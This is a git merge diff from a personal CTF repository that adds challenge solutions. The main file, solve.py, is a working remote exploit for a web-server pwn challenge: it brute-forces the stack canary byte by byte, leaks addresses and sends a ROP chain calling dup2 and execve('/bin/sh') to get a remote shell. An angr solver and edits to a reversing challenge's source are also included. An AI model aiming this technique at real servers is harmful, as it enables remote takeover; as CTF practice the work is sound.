Merge branch 'main' of https://git.spacemoehre.de/simon/CTF into main

.gitignore

@@ -2,3 +2,5 @@ ghidra*
 hydra.restore
 .idea
 core
+.gdb_history
+*.rzdb

Blockharbor/pwn/Web Server Woes/flag.txt

@@ -0,0 +1 @@
+FLAG

Blockharbor/pwn/Web Server Woes/solve.py

@@ -0,0 +1,125 @@
+import time
+from pwn import *
+from subprocess import check_output
+def get_pid(name):
+    return int(check_output(["pidof",name]))
+
+context.log_level = "warn"
+HOST = "celsius.blockharbor.io"
+PORT = 55132
+
+elf = ELF(os.getcwd() + "/web")
+
+gs = '''
+unset env LINES
+unset env COLUMNS
+set follow-fork-mode child
+br *handle_conn+631
+# br *main+420
+continue
+'''
+
+def start():
+    if args.GDB:
+        return gdb.debug([elf.path], gs)
+    else:
+        return process([elf.path])
+
+# io = start()
+# io.recvuntil(b'Web Server listening on PORT\n')
+sender = remote(HOST, PORT)
+
+can_bytes = []
+
+for j in range(16):
+    i = 0
+    while True:
+        # time.sleep(0.2)
+        # io.timeout(0.1)
+        print(i,j,can_bytes)
+        payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + i.to_bytes()
+        try:
+            sender.send(payload)
+            ret = sender.recvuntil(b"Not found!\n")
+            can_bytes.append(i)
+            # print(i)
+            break
+        except:
+            i += 1
+            i %= 0x100
+            sender.close()
+            sender = remote(HOST, PORT)
+            continue
+
+
+base_ptr = can_bytes[-8:]
+base_ptr.reverse()
+base_ptr = int("".join(["{:02x}".format(x) for x in base_ptr]), 16)
+
+canary = can_bytes[:8]
+canary.reverse()
+canary = int("".join(["{:02x}".format(x) for x in canary]), 16)
+
+sender.close()
+rev_can_bytes = can_bytes.copy()
+rev_can_bytes.reverse()
+print(can_bytes, " ".join([hex(x)[2:] for x in rev_can_bytes]))
+sender = remote(HOST, PORT)
+print(p64(base_ptr), hex(base_ptr))
+print(p64(canary), hex(canary))
+# payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + p8(0xb4) #+ b"AAAAAAAA" #+ cyclic(cyclic_find('caaa'))
+payload = b"GET / HTTP/1.1"
+payload += b"AAAAAAAA"
+payload += p64(4)           # sock_fd
+payload += p64(base_ptr-0x41a-0x80)      # ptr to write (-0x41a-0x80) points to somewhere in stack to leak a lot libc
+payload += cyclic(1032-len(payload))
+payload += p64(canary) + p64(base_ptr-0x41a) + p8(0xa9) # 0x41a offset to directly after HTTP/1.1 with $rbp-0x30
+sender.send(payload)
+leak = sender.recvall(timeout=2)
+# ret = sender.recvuntil(b"Not found!\n")
+# print(ret)
+
+libc_heap_base = int.from_bytes(leak[10:18][::-1])-0xce0
+http404str = int.from_bytes(leak[18:26][::-1])
+rodata_base = int.from_bytes(leak[18:26][::-1])-0x30
+code_base = rodata_base-0x1000
+sender.close()
+# gdb.attach(get_pid("./web"), gs)
+sender = remote(HOST, PORT)
+syscall = code_base + 0x00000000000041c
+pop_rax = code_base + 0x00000000000045c
+pop_rdi = code_base + 0x000000000000983
+pop_rsi_r15 = code_base + 0x00000000981
+pop_rdx = code_base + 0x000000000000414
+pop_rsp = code_base + 0x97d
+
+payload = b"GET /bin/sh\x00HTTP/1.1"
+
+payload += cyclic(cyclic_find('aava')) # padding to rop chain
+payload += p64(0)*3                     # pop rsi also pops r13-15
+#dup2(0,4)
+payload += p64(pop_rax) + p64(33)
+payload += p64(pop_rdi) + p64(4)
+payload += p64(pop_rsi_r15) + p64(0) + p64(0)
+payload += p64(syscall)
+#dup2(1,4)
+payload += p64(pop_rax) + p64(33)
+payload += p64(pop_rdi) + p64(4)
+payload += p64(pop_rsi_r15) + p64(1) + p64(0)
+payload += p64(syscall)
+# system(/bin/sh)
+payload += p64(pop_rax) + p64(59)
+payload += p64(pop_rdi) + p64(base_ptr-1116)
+payload += p64(pop_rsi_r15) + p64(0) + p64(0)
+payload += p64(pop_rdx) + p64(0)
+payload += p64(syscall)
+
+payload += cyclic(1032-len(payload)) # padding to end of buf
+payload += p64(canary) + p64(base_ptr)
+payload += p64(pop_rsp) + p64(base_ptr-1018)
+
+sender.send(payload)
+sender.interactive()
+# ret = sender.recvall(timeout=2)
+# print(ret)
+pass

Blockharbor/rev/Reversing #1/angr_solve.py

@@ -0,0 +1,37 @@
+import angr
+import claripy
+import logging
+from pwn import *
+
+logging.getLogger('angr').setLevel('DEBUG')
+
+base = 0x00100000
+
+input_len = 32
+
+success = 0x001014a8
+fail = 0x0010150b
+
+proj = angr.Project("/home/simon/CTF/Blockharbor/rev/Reversing #1/chal", main_opts = {"base_addr": base})
+
+flag_chars = [ claripy.BVS(f"flag_char{i}", 8) for i in range(input_len)]
+flag = claripy.Concat( *flag_chars )
+
+state = proj.factory.entry_state(args=["./chal"], remove_options={angr.options.LAZY_SOLVES}, stdin=flag)
+
+for k in flag_chars:
+    state.solver.add(k >= 0x00)
+    state.solver.add(k <= 0xff)
+
+simgr = proj.factory.simulation_manager(state)
+simgr.explore(find=success)
+
+if len(simgr.found) > 0:
+    for found in simgr.found:
+        print(found.posix.dumps(0))
+        io = process("./chal")
+        io.send(found.posix.dumps(0))
+        print(io.recvall())
+
+else:
+    print(simgr)

Blockharbor/rev/Reversing #1/mod_source.c

@@ -28,7 +28,7 @@ void setup() {
 }
 
 int check_pass(unsigned int start[]) {
-    printf("checking\n");
+    //printf("checking\n");
     unsigned int temp = 0;
     for (int i = 0; i < 4; ++i) {
       temp = start[i];
@@ -50,6 +50,8 @@ void main(){
   memset(start, 0, 16);
   read(0, user_input, MAX_SIZE);
 
+  //printf("%X ",user_input);
+  //printf("\n");
   for (int i = 0; i < 4; i++) {
 
     start[i] |= ((unsigned int)user_input[(i * 4)]   << 24);
@@ -57,17 +59,17 @@ void main(){
     start[i] |= ((unsigned int)user_input[(i * 4)+2] << 8);
     start[i] |= ((unsigned int)user_input[(i * 4)+3] << 0);
 
-    printf("%X ",start[i]);
+    //printf("%X ",start[i]);
   }
 
-  printf("\n");
+  //printf("\n");
 
   if (check_pass(start) == 1) {
-    printf("Thats it!\r\nSubmit in the format FLAG{");
+    //printf("Thats it!\r\nSubmit in the format FLAG{");
     for (int i = 0; i < 4; i++) {
-          printf("%X",start[i]);
+          //printf("%X",start[i]);
     }
-    printf("}\n");
+    //printf("}\n");
   }
 
   // Failed, just spin